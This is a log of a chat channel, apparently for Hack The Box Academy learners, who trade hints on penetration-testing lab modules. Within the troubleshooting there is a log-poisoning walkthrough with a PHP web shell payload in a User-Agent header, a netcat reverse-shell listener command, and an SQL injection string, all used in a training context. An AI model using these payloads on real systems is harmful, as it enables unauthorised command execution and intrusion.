#modules
Ok, i'll try it. Thanks 🙏🏻
can someone help? currently on using hashcat to crack wireless handshakes. and im on question 1. i got hashcat running but its been like 10 minutes and still isnt cracked. am i doing something wrong
Hello, I want to enter the site.
But it gave me an error inside the username. No matter what I did, it didn't work. Please help me.
Need to speak to a person? Learn how to reach our support via HTB Labs.
@vernal dove ^
nevermind. the list was wrong, can someone point me to the right list to use to crack the hccapx file?
Pls help
I'm not staff, the only help you can receive is via support. The article i linked shows how to contact them
Thanks
some hints for skills assessment in Password attacks?
I obtained the credentials of ||jbetty, bdavid, hwilliam, analysed the pcap files||. I missed
Is there someone with the same issue #modules message
How can I get red team role
You need to link your hackthebox account first
I didn't use hashcat for that one, just aircrack-ng
Hi guys I need help with pass the ticket from linux section of password attacks, stuck on the last 2 sections, have root access but the host does not have proxychains.conf lol
Hello ! I have a question for module 'Attacking common services -> skills assessment (Hard) -> last question': once logged in as Fiona on the target, I've found a flag-like password (HTB_....) in the filesystem but it is not Administrator's password. I can't believe it is a dead end. I also tried to log in the DB server with Fiona's credentials, but I don't see anything useful. Can you give me a hint please ?
I'd verify access to all identified services
You're saying your attack host (VM or pwnbox) doesn't have a proxychains.conf file?
sorry i got the answer
I meant the victim host
I have to say PtT sections in Password Attacks are crazy
for the footprinting hard lab i feel like i'm doing too much. i found and copied the key locally but i need to move it to the .ssh directory i shouldn't have to be the root user to do this right?
You don't need to move the key to use it.
ok, i'm getting a public key error
Did you assign the correct permissions so you can use it?
yes
Did you rename it? You can DM what you are trying as to not spoil anything?
@west rampart are you doing Wanderer? Could I dm you?
yes i can, give me a sec
Hi @alpine mural . Send credentials in POST data. Not in URL like module
can someone help with me with skills assessment for cracking passwords with hashcat? im on the last question
Hey can I dm You? I got creds of jbetty and hwilliam I am stuck here a little push will be appreciated
nvm
Should be able to simply follow the section.
Please do not post content over Tier 0. A spoiler tag does nothing.
Hello, I'm doing the Password Attacks Module and in section "Spraying, Stuffing, and Defaults", the challenge is to retrieve the MySQL credentials using a linux user (sam) to ssh to the box. The challenge seems a bit off from the content of the section. I found a zip file that I tried to crack using rockyou but found no luck. After launching Linpeas there weren't any interesting files containing passwords so my guess is the zip file. Is this the correct path or did I miss something ?
Let me see
Can someone please tell me a username so I can enter the site without giving an error?
Dm me I will help u
@cold star help me pls
What topic?
@cold star
Sorry bro I am not good in web pen only have some knowledge of network attacks
What's your username in hack the box
Vanshdhawan ig
someone can help me with NTDS.dit
Yea in password attacks module?
Yea what help u need in it?
Can i Open dm
Yea
What’s up everyone , hope all is well … I guess I do have a question … but it’s very personal and I want to ask anyone who is online (:
This channel is for discussion of the HTB modules, not personal questions.
spamming this exact question in EVERY server you're on?
I have different questions for different server types
Idk why you’re reporting me
I'm not reporting you, I'm voicing an observation. You've posted this on every server we share
Sorry well I just got banned off a server I was part of for months but I decided to jump back in the bandwagon , sorry for assuming
Yeah I have to re-verify my hack the box account
Hi, Password Attacks Module got a full update or just a few sections were added?
Some were added some were removed and some were renamed
Good! Thanks!
Hey everyone, I hope you'll are having a great day!
hey people, im getting troubles with skill assessments on Password Attack, im not understanding how to pivot to first user, any hint about it?
Hey guys i'm doing the Windows Event Logs & Finding Evil module and i'm stuck at the windows event logs section with the first question any help?
Yo guys i need help on pivoting skill assessment
Ive access to 172.16.6.0/24 network from my host
Though ping sweeps dont yield anything
Neither rdp port scan yield anything (on the whole subnet)
Password attacks module - Issues with "attacking windows credential manager", I have already uploaded a support ticket but wanted to see if anyone else here had any issues or if anyone has completed it. If so, DM me, I'd like to discuss how you did or what issues you came across.
you wont believe it but.... ligolo-ng?
I already have a route to that subnet
But i dont know what to do next (supposed to find another host in that subnet i guess)
im having the same issue
Why not try using netexec to identify hosts?
Depends. Why not play with it a little and figure it out?
Lemme try
If you run into issues or are not understanding something going that route, you can DM.
I generally learn a lot simply messing around. Plus they have a decent wiki.
Good evening, does anyone know how to get the version of a service with filtered status in nmap? firewall ctf ids/ips
Try to evade the firewall. There are options in Nmap specifically to do that
If this is related to a CTF, you are on your own and I would try Google.
I recommend looking at the nmap module
It has several ways in order to banner grab services via firewall evasion. Should you feel so inclined.
Is this the one running the .exe and getting the SHA256 hash?
Did your proxychains work before the double pivot? You can DM, so there is no spoiling this module and I am going to delete your original post as it contains content above Tier 0 and there are some folks who do this blind.
Like I said, you can DM as I don't mind helping you troubleshoot it.
I'm not looking for an answer from the CTF, I just want some light on which path to follow, I've been looking for solutions in the nmap documentation since this morning, trying to use other tools, but I'm not having success in any of the cases.
Vader gave you some great information, so I would go that route.
I'm on the password attacks module where i have to extract the onedrive password from mcharles. I used mimikatz, did the UAC bypass, and got a password but its not saying its correct.
Alright no worries. I was having issues with getting the proxy server to work through metasploit but I ended up figuring that out by just setting the srvhost option with my tun0. Just retraced my steps as well and I'm still getting the same results.
If you are certain of the answer, check for extra spaces and can try to refresh the page and resubmit it.
it starts with "proof"
So you're not seeing any connections in your output?
oh nope nvm i found it
I forgot to token::elevate
mb it just took me taking like 3 extra seconds lul
Hi everyone, I've been stuck on an issue with Session Log Poisoning in File Inclusions (LFI), I seem to be able to poison the log, but I'm quickly destroying the log somehow, getting a 500 internal error before I can make anything happen.
Does anyone know what I'm doing wrong?
In the burp request:
get request: url......?cmd=id
User Agent: phpwebshellcodehere
Make sure you escape with the proper quotes, also once you upload the shell, you no longer need to manipulate the UA, you can still abuse the poisoned log
Steps I took:
Found the nginx access.log
Intercepted with Burp, send to repeater.
Changed user agent to
User-Agent: <?php system(\$_GET['cmd']); ?>
Hit send.
Revert user agent, add ?cmd=id to my GET request
= 500 internal.
Am I doing this correct? I had the same issues when doing the actual Poisoning lesson, couldn't figure this one out dunno why
I think something is wrong with this. Lol i was literally having the same issue and was gonna post. My server keeps crashing after hitting send
@vernal tapir are you saying you resolved this issue?
Nope, can’t seem to figure it out
You need to escape the user agent field in the request. First check the logs to see what I mean
If it bricks you gotta reset the target
Thank you Marcie
I did this. Using poison or whatever always works. Once I change it to the PHP webshell it bricks.
I rest the target and the same thing.
Reset*
What do you mean escape the user agent exactly?
You mean like erase it after hitting send the first time?
How do you escape things for xss
Similar concept applies
Oh so like "> ?
Something like that
"><?php sytem($_GET['cmd']); ?> still bricks
Step 1: check the log file
I have been trying to get this to work, i am having trouble. I have tried copying it with the + in the card number, i have tried adding dashes every 4 numbers, i have tried copying it, manually typing it in, etc. Nothing is working.
try spaces
there have been a few times people hit this apparently so you're not alone
Im struggling i dont get anything but 200 when I send the user agent once. Its when I send it the second to get my request is when it always bricks
@fathom pendant I've also seen a video of this to see if I'm doing anything wrong and the dude just sends the php shell as user agent, clicks twice and gets his/her request.
and they do it without escaping the user agent
By check the log file, I mean do it before you do anything else. Also are you sure they didn't escape it?
Or are you misinterpreting how it's sent 😉
Like, for instance, them wrapping the user-agent in quotes
The log comes through the first click then for me on the second click always bricks.
¯_(ツ)_/¯
When i saw the other guy post here I was like damn maybe there is something wrong with the module.
I don't recall having issues
@fathom pendant I'm gonna work on this further. I've spent a while on it and need to step away and exercise or something lol.
@vernal tapir any luck?
Yeah I got it
Was tough but use Burpsuite to load the payload in the user agent
Use browser to refresh log after using command to read it
if it doesnt brick ur good
check dm
The impacket version of SMBclient should be able to help you out a little better
If it's too laggy/unreliable then the issue is likely connection related
It’s fast, user friendly and most importantly you don’t have to deal with that awful syntax
Need help in Pass the Certificate section
gettgtpkinit.py error oscrypto.errors.LibraryNotFoundError: Error detecting the version of libcrypto
i tried pip install oscrypto but nothing change.
try create a new venv python and install pip install pyOpenSSL==23.1.1 cryptography==39.0.1
me too, a few days later 🤣
was using pwnbox and the rev command was aliased to nc -lvp 9001 by default. already unset it. has this happened to anyone else's pwnbox instance??
looks like a default configuration cos that command is used a lot for receiving reverse shells
solved it, Thx
makes sense. I was just losing my mind for like two minutes before I checked for an alias lol
add module name and section name
doing the same one right now...PowerHuntShares is throwing exceptions for me if I use it exactly as described in the module (already set execution policy)
haha, thought so too ^^
welp, i suppose I still got some importing to do, someone else asked about this tool yesterday. not sure if my brain is just foggy, but I'm not seeing it in the module text...
one of the few people that didn't take it to DMs for this question recommended using manspider yesterday.
imma give it another shot tomorrow, I can't get docker to run rn..
there's another tool, not sure if it's showcased or not, snaffler; ik it's showcased in the AD enum module as a way to find shares
Not sure if it's just me, but snaffler wasn't finding creds in shares, powerhuntshare didn't even find most of the shares
i haven't done that section yet so i can't comment on what i did/didn't do to solve
When you get new creds for first question, you will get access to extra shares using that creds.
Hiii
hi people, im getting this issue trying to run xfreerdp3, never had until now, ive tried modification on /etc/krb5.conf but nothing is working. Help please
anyone? im stuck here
Hiii, I got a question in regards to the use of subbrute tool, in terms of the resolver file, my understanding is that you are supposed to put in the name server for that domain for it to work, however, for one of the module, it seems any name server seems to work fine like `ns1.inlanefreight.htb`, `ns.inlanefreight.htb`, `inlanefreight.htb`. i tried all these 3 entries and it seem to all return the correct result, my question is arent we supposed to use the correct name server which was found using dig NS inlanefreight.htb for the resolver file for it to work? thanks!!
If you see something like that in the future you can ping SERIOUS RULE BREAK (put an @ before it) to get a mod/admin
how it works ping SERIOUS RULE BREAK? can u give me an example
type @SERIOUSRULE and you should see it pop up. Reply to the message with that tag and itll ping a mod.
don't do it now of course
but you should see the ping pop up if you start typing it
someone there for questions about "Intro to C2 Operations with Sliver -> Probing the Surface" cannot establish a connection
plis
what module requires this?
yeah
issue solved. Skill Assesment from Password Attack
Intro to C2 Operations with Sliver
wrong message
Hello friends, I have a question about the Academy platform. If I buy the Gold package, will I have access to all Tier 3 modules ? (except for giving 500 boxes every month)
I'm following the instructions at "Probing the Surface" (many times) but the connection doesn't come up.
Is there something different to do, what is not described in the section?
can you dm what you did
Hey guys, anyone can give me a nudge on injection attacks pdf part?
Gold annual is the one that gives access
Gold monthly is a different one
can anyone help me in section Static/Dynamic analysis in module Introduction to Windows Evasion Techniques please?
i use the provided code in the section, but it doesnt work although i have hardcoded the port and ip address
In ADCS Attacks module, PKINIT section, is this RBCD attack using Rubeus' asktgt correct? I thought the RBCD is about impersonating a user to access a specific service, and hence an impersonated TGS (so taught in the Kerberos Attacks module). And therefore we should be using Rubeus's s4u instead of asktgt.. Can anyone help explain
Now I am talking about the monthly Gold package. Will this monthly package give me access to all Tier3 modules?
The gold subscription will allow you to unlock a module of your choice that is classified as Tier 3
If you want all access to Tier 3 modules, you can get the Gold Annual plan
Haaa, OK. I understand, thank you.
The gold annual is the only one that gives the access; the monthly only gives the cubes per month
I also need
Dont understand the point of Exploitation of PDF Generation Vulnerabilities when it has nothing to do with pdf exploits but LFI enumeration. Hint says I need to find a port but it doesnt matter if I have a port to an internal app I still need the flag file name.
i'm stuck on the password attacks module. specifically the part on "writing custom wordlists and rules"
i'm not able to generate the required password. can anyone provide some help?
unless they changed that drastically, there should be a provided custom.list in the resources
I hated that section so bad
6 hours of waiting, not doing anything productive, hoping the list you generated was the correct one
burnt by not grabbing unique values
apparently they made some of the more painful sections slightly better
i've just not had the will or energy to sit down and redo the module
Same, mainly cos I'm at 90% and don't wanna have to go back, I only did the new sections
that has changed now they have a scenario, where they provide osint about target, password policy and give a md5 hash. The 4-6 hours cracking before was just seriously maddening.
also if you do it properly you didn't need the 4-6 hours LMAO people forget about threading
I had it at -t 40
fax
An old question, but what Linux is everybody using? I used Ubuntu the other day, yeah that was a day spent trying to get it to open up for Windows Fundamentals, but I got it after asking myself some noob questions, posting and getting the 'did you do this?' which I didn't but then did it. I also spent the rest of the day trying to get Kali to open up properly, stopped that to get the sad news that my in-laws dog had two or three fatal seizures then passed away (Christ! that is so hard and painful to type, think or say-he was the bestest boy in the world) and got Kali to go this morning when I have shit to do. But seriously, which Linux does everybody use? I love deepend diving and plan to use and abuse Kali. Thanks for your input.
kali linux with everything metapackage, so I do not have to install most of the tools 😅 🏃♂️➡️
You can also use parrot, which is used in the htb pwnbox. Or a os based on arch, it can be more complicated, but therefore has also additional packages in the community package streams. But in general you can use nearly every OS it depends on your likelihood
Hello guys, I am doing the cwee modules and I am stuck on the exercise of password reset poisoning of abusing http misconfigurations.
I tried injecting all these header with interactsh.local:PORT value:
||Host
X-Forwarded-Host
X-Host
X-Original-Host
X-Forwarded-Server
Forwarded
X-Forwarded-For||
and still in the /log page I dont see the reset token.
Hi, I think i need help to reproduce these Advanced Exfiltration with CDATA From the CBBH (Web Attacks) , i tried doing the same thing from the modules still i'm not able to reproduce me , idk what am i doing wrong here
why is zap soooo slow? On the web proxies modules and it takes for ever to intercept a request
you don't have to do the CDATA thing
there's another method from the section iirc
Error Based XXE works for these scenarios but i was trying to replicate both of those methods taught in the module , but was unsuccessful with that another CDATA method. do you know like why didn't it worked?
no idea, error is the intended
hmmm, anyways it's alright . maybe i would comeback later to these and try again
Hi
hello, can someone give me a little hint with the new password attack skill assessment? I feel I'm really close, but i still can't get it
sure dm
I think so
I know this is not necessarily from a module, but can also happen in modules
does anyone know how to fix this:
┌──(kali㉿kali)-[~/admin]
└─$ impacket-getTGT machine.htb/account:<redacted> -dc-ip 10.10.10.10
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
┌──(kali㉿kali)-[~/admin]
└─$ sudo net time set -S 10.10.10.10
┌──(kali㉿kali)-[~/admin]
└─$ impacket-getTGT machine.htb/account:<redacted> -dc-ip 10.10.10.10
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
┌──(kali㉿kali)-[~/admin]
└─$ sudo ntpdate -u 10.10.10.10
2025-06-12 14:15:23.979218 (-0400) +25308.218795 +/- 0.021387 10.10.10.10 s1 no-leap
CLOCK: time stepped by 25308.218795
┌──(kali㉿kali)-[~/admin]
└─$ impacket-getTGT machine.htb/account:<redacted> -dc-ip 10.10.10.10
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
i tried net time set and ntpdate, which are the 2 methods I know
still nothing
You need to adjust your time to match the time of the DC or the machine, otherwise any attempts of Kerberos authentication will fail
already tried
sorry
Gotta ensure nothing else is changing back the time
best option is to probably use faketime
faketime "$(date +'%Y-%m-%d') $(net time -S $DC_IP | awk '{print $4}')"
This is my solution on a default kali installation
sudo timedatectl set-ntp false
sudo ntpdate -u $Machine_IP
After you are done just turn ntp on through first command replacing false with true
Im using Kali default. It Worked!!!
Thank you very much
Gotta give credit to chatgpt
Hey, I am stuck at password attacks assessment I have found creds of: Betty and Hwilliam But don't know how to proceed further any hint will be really helpful
This has been asked a ton lately. I'd try searching the channel first to see if anything has already been provided that can get you unstuck.
Okay, Thanks
You can dm me if you are super stuck but I think you should be ok with a simple search
Okay
Hey guys! Been stuck on Password Attacks - Credential Hunting in Network Shares, second question for about 6 hours... anybody willing to give me a nudge? 🙂 Thanks!
I had left that for last it was very bad
I think we have to manually read through snaffler output to get answer
Ok I'll give that a go 🙂 Thanks!
netexec spidering is something you can try.
Oh yeah, I've been using that and MANSPIDER trying to spider all different words I can think of 🙂
Are there any keywords in the question?
May I DM you?
Sure
Automatic tools don't always help...
can someone give me a hint for the Skills Assessment of Advanced XSS and CSRF Exploitation? I'm stuck
I've been trying to solve the section on XSS session hijacking for more than 2 hours now. While I am able to get the cookie, they are just wordpress_test_cookie
I keep getting this error and I dont know why
what is the module and section, and what exercise are you trying to do
Are you still receiving that cookie?
Apologize, I should have added that. This is the "Cracking Into Hack The Box" Module is Web Requests, exercise is POST
Here is my full command log if you need
try http://
On the useradmin?
you are specifying https in the URL, try http
O H
I see now XD
Thank you, such a small detail and I somehow missed it completely
Anyone know how to fix this?
Maybe check if chromium is installed, if not install it?
You should be able to choose which browser to use in burp, try see if that doesn't help 😄
hy anyone completed injection module
which injection ?
injection Attacks
You can use any browser with burp with proxy setup and importing cert, burp has its own browser(chromium) in which everything is setup. The op has posted about that built-in browser feature.
can anyone help me in injection Attacks
injection Attacks module
yep, Manspider finally worked for me! Thanks for the link to the docker resource. I was running on PwnBox, I think I ultimately just had to restart the docker service and use sudo for some permission thing that wasn't mentioned in the example. Will need to spend some more time wrapping my head around what I'm actually doing there, but got the exercise solved at least 🙂
thanks, yeah that was mentioned in that section too, I don't recall why it didn't do the trick for me yesterday
cat /etc/passwd | cut -f1 -d: guys I am doing Linux Privilege Escalation and I didn't understand from the section write up what does this command do?
list all passwords? used on the system
???
passwords not stored in passwd
theoretically one of them can be used to become root right?
this command just lists users
no no but i found out how to process it thanks for you help 🙂
What is the trick to get impacket-ntlmrelayx to capture the CSR and create a .pfx file in Password Attacks/Pass the Certificate I am getting nothing, any help appreciated.
You need to use ntlmrelayx to listen for inbound connections and relay them to the web enrollment service. Then you need to find a way to coerce the DC to attempt authentication against your attacker host.
guys hello give some tips how to solve linux privilege escalation environment enumeration section?
nothing in the section itself gives information how to get shell or how to find this file
even the command sudo -l works from time to time
Thanks for response, I am listening and relaying with ntlmrelayx to the CA server at the location specified in the module and I am attempting to authenticate through the DC with RPC using provided credentials to my own attack box with printer bug. I am using the commands in the module substituting the IP's provided and my own box IP.
If you did everything correctly, ntlmrelayx will generate the .pfx certificate, if it did not work, your syntax is wrong somewhere. maybe mixed ips or similar.
You may need to run it as root.
I got a base64 iirc that I needed to pipe to OpenSSL
Damn those FW’s
who needs em anyways
hey how long did you guys take for the footprinting -> dns module.
im stuck at question 4 with trying now the 5th different wordlist.. sitting here 2 hours just to get the one entry ..
i can see it happen in a real engagement but come on really now?
I recall that one being tough
Try a fierce wordlist
i did.. nothing. i now am thinking im doing something wrong maybe
Subdomains of Subdomains is the other one unless they changed it
@cerulean hinge careful revealing spoilers like passwords
Those are password the module give us
It's still a module spoiler
oh ok, what was the issue ?
With your post? Just the spoiling of passwords and such.
The issue you're having in the module? Don't know
Yeah I mean with my post. How is it a spoiler if the passwords are within the module itself ?
It falls under "module content," as per the channel description - do not spoil module content above tier 0
Ok sorry then
Hello,
I'm stuck at the "Unconstrained Delegation - Users" part of the "Kerberos Attack" module.
I manage to get the ccache file for the DC machine account however I can't use it to perform any further attack from my kali.
Here is for example the message I get when trying to perform a DCSync : "KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)".
Can someone know why please ? Thank you
Did you add the ip and relevant lines in your /etc/hosts
Yes I added the IP + domain & machine name.domain
I will add and try
it's not working. I think my issue is on how I setup the krbrelayx.py. I tried to do it without the hash (which seems to work at it decrypt the TGT) but not sure about it.
Guys
What to do if I completely fucked up after watching MrRobot
Like it fully changed my mind I can’t understand how to fix it now
This has nothing to do with htb academy
Ye I know it
Ntlm relay... relays the credentials, passing the hash is just using the the hash as a form of logging in
Then it doesn't belong in this channel, read and follow instructions in #welcome to access more of the server
Relaying is what's used in some instances where the hash may not be able to be used or you need to do some other stuff. Relays utilize the whole ntlmv2 hash not just the lm:nt hash. This includes the timing and stuff embedded into the hash
okay so im missing something here about the dns and whole transfer zone thing.
i did dig axfr on the base domain and got some ips
and now i was supposed to run a bruteforce on every single subdomain till i get the answer that i need and with possibly whatever many different wordlists? i mean that cant be right? am i missing something?
i got the answer online and sadly now got spoilered but im also kind of glad i was. i dont know if i wouldve ever came on the idea to do that.
i did try to bruteforce the main domain all the time with different word lists..
Yeah it's under subdomains, you can narrow down the list a bit btw. You already can transfer to one of the subdomains, so cross that off.
You can also do a little loop to run through the subdomains and wait
Also: always start small then go bigger
but how could i have known i need to brute the subdomains. like i feel like that wasnt communicated in the page or maybe im missing something im not sure.
i dont understand how i was supposed to know that i need to do that.
i dont think im fully understanding dns and the whole transfer thing .. its like i had no clue at all
Guys who has done LINUX PRIV ESCALATION how did you find flag in environment enumeration section?
Think of it this way: if you can't find the info on the surface, dig deeper
Also I've found utilizing the bruteforce tool also misses the important subdomain to start on as opposed to using dig
Hii
hm i guess. i dont know. its not intuitive to go to like a sub sub domain. i constantly thought i need to just find a "normal" sub domain.
And that's generally not how dns works. You're making the assumption that it's like a web server that you just need to fuzz for the right thing on the onset. As opposed to it being recursive
yeah like i said i dont think im really understanding dns yet. i read the page like 3 times i dont know
you don't need to have too much in-depth knowledge of it ¯_(ツ)_/¯
Just the basics of searching records
Hello?
you mean like using dig and being able to read the records ?
and now i learned with you that i also need to maybe brute the sub domains so is that enough to safely go next module or should i keep at it?
I tried to verify the bot says it failed
Thats enough just keep those things noted
Hey there, any idea why the application is not responding?
App not responding is normal for hackster. Run the command again in #bot-commands
i did 3 times i don't want to get banned for spamming or something
:0
You won't get banned I'm asking so I can see at fresh error in the log
okay i will again
So I can sort it out. Dm me so we're not flooding the channel
hello
hello
has anyone done the introduction to bash module ???
i was in the section of "comparison Operators" doing the exercise
I think im close to the answer but I dont know what I am missing
I can DM with the answer or the code i have
You can DM what you have.
Guys has anyone done Linux Priv Escalation?
Many people have
ey, hello, im doing a scanner with PCredz and i dont found the credit card number. im in attacks password module section Credential Hunting in Network Traffic
nothing, i found it
I've generated a new VPN pack, restarted the machine, still nothing
Had to use the solution because I was so confused
Hey, I am stuck at password attacks assessment I have found creds of: Betty and Hwilliam and an Admin local account But don't know how to proceed further any hint will be really helpful, I tried a lottttt of things...
Okay scrolling through message history it seems like this box has had issues in the past, I'll just skip this
Thank you
Hey awesome peeps, can anyone help me figure out why ZAP isn't loading the HUD in Firefox on Pwnbox?
I checked the box to enable it, but no dice
You can dm for hint
@graceful urchin don't share screenshots with answers
nm i just didn't use the hud lolz
how did you find it? I only managed to find it with wireshark
fair point sorry
i do it with wireshark, Pcredz only found the user, the password and SNMPv2 community string
Yeah same, weird because Pcredz supposedly finds credit card info also
yes, its supposed to do it
You can figure that out with a whoami. I'm going to delete the screenshot since it is from a higher tier module. If you want you can DM about this one.
by the way did they update every page in Password Attacks?
hello i have synchro problems with the clock skew too great for kerberoast no way to get it out anyone have an idea? thanks
Not every page, but plenty of them
They even added some sections
Hey yall, pretty basic question here. I'm doing the web app enumeration and I'm learning about crawlers. In what context would I use a crawler over a traditional directory brute forcer? Is the main benefit of the crawler that it'll go deeper into the file system whereas the directory brute forcer won't?
faketime
Crawlers look at the page itself
Ahh so there where 3 that appeared as not completed that I have done but there are others that I should go over
i think you can also use ntpdate or something
Bruteforcers just look for predefined words from the wordlist, whereas a crawler looks all over the page and clicks links on the page
so it basically makes the wordlist more accurate to the target
Crawlers don't use wordlists
Yeah I misspoke, I meant like morally
?
@fathom pendant thanks a lot
from a pure math background, we'd say something is morally true if it makes sense but kind of handwaving it
and here i meant it like "oh, crawlers have a more accurate wordlist because they're taking directly from the page rather than using a dictionary"
it's not exactly correct but it's like handwave-y correct
They just serve different functions
yup
For example an /admin/ endpoint likely won't be found by a crawler if it's set up properly
And a /testtesttest111/ endpoint wouldn't be found by a bruteforcer but if it's referenced on the page it'll be found by the crawler, right?
Yep
Generally if it's linked it'll go to it
But crawlers may be written to check things like that
`faketime "$(date +'%Y-%m-%d') $(net time -S 10.10.11.72 | awk '{print $4}')" zsh`
still always the same KRB_AP_ERR_SKEW (Clock skew too great) :
😦
You can DM what you are running this with.
If you need any more help with this, the #1380967904429871275 is the channel for questions related to that box.
Hello all, looking forward to dive deeper into cybersecurity. Currently finish my AAS. Information Technology - Programming (ETA August 2025) & have decided to pivot and get more into cybersecurity. Found myself not really enjoying full on coding. Am i crazy for pivoting lol fyi im 30yrs old
you can dm if you want
does silver or gold in the academy open up additional VPNs? I'm in asia pacific and latency for some of the RDP-based modules is painful
no; there's no different vpns
is it common for LFI vulnerabilities to cause problems with the server?
LFI alone: not too high risk, have sensitive files readable? Higher risk, can attacker also write to some place? (Eg logs etc) oh no~ RCE
@waxen totem thanks. only reason I asked is because my target kept becoming unreachable.
Not likely but if your LFI involves a lot of requests it can DDoS
I suppose these don't really need to be the most resource heavy containers/vms.
Id swap VPNs if your connection keeps dropping
hi
Not here.
what?
Best to ask for help in #boxes
When I test below regex with "^.@[A-Za-z]\.[A-Za-z]*$" regex101 shows no match found but in the course 5 matches found.
How does the course content show 5 matches and the site zero?
course content:
you have two slashes instead of one, it's looking for a slash in the middle
Nice catch
Hey how can I hunt my first bug Bounty pls help
From where should I start from
I know the basics
@thin citrus
@fathom pendant
@jaunty anvil I have never done bug Bounty hunting
Not a correct channel to ask about it.
This isn't the channel for bug bounty discussion, please don't randomly ping people. This channel is for discussion of the HTB modules.
@jaunty anvil don't ping random people
Then where is it pls help
Doing win privesc {Windows Built-in Groups}
when trying to use this command '$key = Get-BootKey -SystemHivePath .\SYSTEM' gets below error
(i followed the Module Walkth and got this error) (i got the flag, was just doing it for practice)
```
Get-BootKey : Requested registry access is not allowed.
At line:1 char:8
+ $key = Get-BootKey -SystemHivePath .\SYSTEM
+        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : OpenError: (:) [Get-BootKey], SecurityException
    + FullyQualifiedErrorId : GetBootKey_OtherError,DSInternals.PowerShell.Commands.GetBootKeyCommand
```
what tool or site is this?
@wooden seal https://regex101.com/ but it was the escape slash
Hello,
I believe there is an issue with Attacking Windows Credential Manager section on Password Attacks module. I cannot access the target, it is just not pinging back. I have tried switching servers, I have tried using VPN as well as using pwnbox, it still doesn't work. Could someone double check if this is my issue or if the lab is broken? Appreciate it
sometimes windows targets may not respond to pings, did you try to RDP?
Never came across this issue, thank you I am just dumb 🙃
thanks !
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@cloud mural 👆
Thank you 🐧
anybody else's VM freezes when running ZAP active scan, it get's to 39% and then freezes the whole VM
Hello everyone 😃
Nevermind, fixed it
Hi, I'm a beginner.
Can someone explain how the PE works on the Tombwatcher machine?
Thanks ; )
For boxes, please ask in #1380967904429871275 or #boxes
if you cant access mentioned channels, read and follow #welcome
okay, thank you
Hello, I am struggling on the LLM Output skill assessment, can i ask a little question to someone who finished it ?
sure @solemn vale
ahh I see, I thought it was a UAC value that was being referred to as "non default privilege". Thanks man!
there is a problem in the android fundamentals - skill assessment, the second question about the UID of the application com.android.settings
please post in #1234357888114364508
English only @languid remnant
and please dont spam
Okay
Yes there are dozens of problems in that module and I reported it many times to get improved
if you have some questions contact me I will try to guide
hey hii everyonee
still need help with this
Not everything in the sections can be reproduced on a target
thanks, i was stressing thinking i am doing something wrong lmao
I had the same issue few days ago 😅
did ya do the UAC bypass one? Was the flag just on the desktop? 😂
I mean I skipped all the "check the privs" "run the dll" cos I knew I could just skip straight to the path loaded dll as system
omw to speedrun that now thanks for the leak
can someone help me with SQL injection inside the signup functionality, tried all field with a basic injection '//or//1=1-- and on the email with@bluebird.com. Need to write file.
SQL Injection fundamentals module?
it is time to update the new android static analysis modules xD
because on APKCombo it is XAPK for arm and it will not work on the emulator x86_64
between the android studio part where it uses old UI and some others stuff, it became debugging the course xD
Is it just me, or do a lot of the HTB academy skill checks involve doing things that have zero relevance to what they're teaching in the actual module you're on? It's pretty frustrating. You'll read a mind numbing amount of information thinking you're about to apply that in the skill check, only to realize that passing the check involves something that hasn't even really been taught
Does someone have this too on the CAPE module: https://academy.hackthebox.com/module/263/section/3092
```powershell
PS C:\Tools> .\SharpWSUS.exe inspect
/ || | __ _ _ __ _ \ \ / / || | | / |
_ | ' \ / _` | '| ' \ \ /\ / /_ | | | ___
) | | | | (| | | | |) \ V V / ) | || |) |
|/|| ||_,|| | .__/ _/_/ |/ ___/|/
||
Phil Keeble @ Nettitude Red Team
[*] Action: Inspect WSUS Server
Something went wrong, unable to detect SQL details from registry.
Something went wrong, unable to detect SQL details from registry.
[!] Unhandled SharpWSUS exception:
System.NullReferenceException: Object reference not set to an instance of an object.
at Connect.FsqlConnection()
at SharpWSUS.Commands.Inspect.Execute(Dictionary`2 arguments)
at SharpWSUS.Args.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
at SharpWSUS.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)
```
I reverted the lab twice now, the powershell windows has been executed with admin privs (also tested a window without admin privs)
Skill assessment, Web proxies
Can I not use ZAP for this?
The hint mentions burp
Every exercise is solvable from ZAP, but I needed to install script for to hex payload processor, I think it was this one?
It's possible with ZAP cos I was already familiar with burp I did the entire module with ZAP
Same, it allows us to fuzz at normal rate and has some auto scanning functionality
but i cannot fuzz the last character and decode the whole cookie at the same time
It can, use payload processors
Are you on the WSUS server or the other host?
srv01 😁
You're gonna wanna get on WSUS.
ohh okay, thanks!
I am
Hello
It doesn't allow me to enter general chat though
Follow the information in welcome
can i get a hint?
im adding a # to the end of the cookie to then fuzz it, but then i can't add another fuzz to encode the whole cookie including that # that im already fuzzing
Sounds like you are doing the modules in wrong order?
can i get a hint?
sure dm
anyone for #modules message tried many things in the signup form but to me it is not possible. Also as a second-order not working
btw your process is flawed, rethink your approach as everything need to be encoded
my mind is broken guys i studied 12h today all about web hacking
Applications of AI in InfoSec => Model Evaluation (Spam Detection) => model submission (workspace VM doesn't have the required service started to submit a model...anyone else have this issue?)
Hey I need some help I am new to Linux and was trying to open the VPN file provided in the academy but openvpn keeps giving error in the terminal .
I am using ubuntu on a VM
What's the error?
(screenshot?)
Give me a minute I will share the image
sudo openvpn <path to vpn file>
example: sudo openvpn username.ovpn
Just cd into Downloads and take off Downloads in the command using only the file
Same error as the second
openvpn --version
after this you can try
sudo openvpn --config <filename> --daemon &>/dev/null
It always works for me and others who had the similar issues with openvpn
and then you'll never see any errors...
get it working?
Ok let me try and get back
Also I am doing the linux fundamentals module and any other resource you would recommend for starting with linux
If any suggestions
@outer stone
update it if possible, I think that's the issue (the openvpn profile downloaded is using options your client for openvpn doesn't support or doesn't have enabled)..?
100% - complete this: https://overthewire.org/wargames/bandit/
Hello I have a question
Am I able to download ParrotOs onto my windows laptop? Currently reading over “Setting up” within the Information Security Foundations module
Parrot Security website
